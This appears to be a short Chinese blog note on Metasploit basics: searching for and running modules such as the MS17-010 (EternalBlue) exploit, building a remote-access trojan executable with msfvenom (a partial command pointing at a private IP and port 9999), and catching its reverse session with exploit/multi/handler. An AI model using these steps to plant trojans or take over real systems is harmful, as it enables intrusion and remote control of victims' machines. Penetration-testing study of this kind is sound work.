msfconsole
步骤
使用metasploit攻击三步走
使用模块-选择参数-发起攻击
比如搜索漏洞search ms17-010搜索永恒之蓝漏洞
use 模块名称
配置模块必选项 set
运行模块run



退出按exit
使用msfvenom生成远控木马
- msfvenom是用于生成远控木马的软件,在本地监听上线,msfvenom在shell里面使用不是msfconsole终端
- 指令格式如下:
- lhost=192.168.190.129 lport=9999 -f exe -o demo.exe
- -p表示payload 系统/架构/作用/方式 -f表示格式
- -o表示输出文件
设置多模块攻击
- use exploit/multi/handler 使用这个模块
- set lhost 设置本地IP
- set lport 设置本地端口
- run 运行模块并,等待木马被执行
- 有会话连接就是中招了
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 YuShan!
